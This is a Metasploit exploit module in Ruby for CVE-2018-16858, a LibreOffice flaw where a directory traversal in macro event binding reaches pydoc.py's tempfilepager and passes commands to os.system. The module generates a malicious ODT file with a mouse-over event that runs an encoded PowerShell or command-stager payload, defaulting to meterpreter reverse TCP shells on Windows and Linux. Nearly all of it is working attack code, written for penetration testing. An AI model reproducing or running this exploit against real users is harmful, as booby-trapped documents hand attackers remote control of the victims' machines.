Path: blob/master/modules/exploits/multi/fileformat/libreoffice_macro_exec.rb
19669 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::FILEFORMAT9include Msf::Exploit::Powershell10include Msf::Exploit::CmdStager1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'LibreOffice Macro Code Execution',17'Description' => %q{18LibreOffice comes bundled with sample macros written in Python and19allows the ability to bind program events to them. A macro can be tied20to a program event by including the script that contains the macro and21the function name to be executed. Additionally, a directory traversal22vulnerability exists in the component that references the Python script23to be executed. This allows a program event to execute functions from Python24scripts relative to the path of the samples macros folder. The pydoc.py script25included with LibreOffice contains the tempfilepager function that passes26arguments to os.system, allowing RCE.2728This module generates an ODT file with a mouse over event that29when triggered, will execute arbitrary code.30},31'License' => MSF_LICENSE,32'Author' => [33'Alex Inführ', # Vulnerability discovery and PoC34'Shelby Pace' # Metasploit Module35],36'References' => [37[ 'CVE', '2018-16858' ],38[ 'URL', 'https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html' ]39],40'Platform' => [ 'win', 'linux' ],41'Arch' => [ ARCH_X86, ARCH_X64 ],42'Targets' => [43[44'Windows',45{46'Platform' => 'win',47'Arch' => [ ARCH_X86, ARCH_X64 ],48'Payload' => 'windows/meterpreter/reverse_tcp',49'DefaultOptions' => { 'PrependMigrate' => true }50}51],52[53'Linux',54{55'Platform' => 'linux',56'Arch' => [ ARCH_X86, ARCH_X64 ],57'Payload' => 'linux/x86/meterpreter/reverse_tcp',58'DefaultOptions' => { 'PrependFork' => true },59'CmdStagerFlavor' => 'printf',60}61]62],63'DisclosureDate' => "2018-10-18",64'DefaultTarget' => 0,65'Notes' => {66'Reliability' => UNKNOWN_RELIABILITY,67'Stability' => UNKNOWN_STABILITY,68'SideEffects' => UNKNOWN_SIDE_EFFECTS69}70)71)7273register_options(74[75OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt'])76]77)78end7980def gen_windows_cmd81opts =82{83:remove_comspec => true,84:method => 'reflection',85:encode_final_payload => true86}87@cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, opts)88@cmd << ' && echo'89end9091def gen_linux_cmd92@cmd = generate_cmdstager.first93@cmd << ' && echo'94end9596def gen_file(path)97text_content = Rex::Text.rand_text_alpha(10..15)9899# file from Alex Inführ's PoC post referenced above100fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-16858', 'librefile.erb'))101libre_file = ERB.new(fodt_file).result(binding())102libre_file103rescue Errno::ENOENT104fail_with(Failure::NotFound, 'Cannot find template file')105end106107def exploit108path = '../../../program/python-core-3.5.5/lib/pydoc.py'109if datastore['TARGET'] == 0110gen_windows_cmd111elsif datastore['TARGET'] == 1112gen_linux_cmd113else114fail_with(Failure::BadConfig, 'A formal target was not chosen.')115end116fodt_file = gen_file(path)117118file_create(fodt_file)119end120end121122123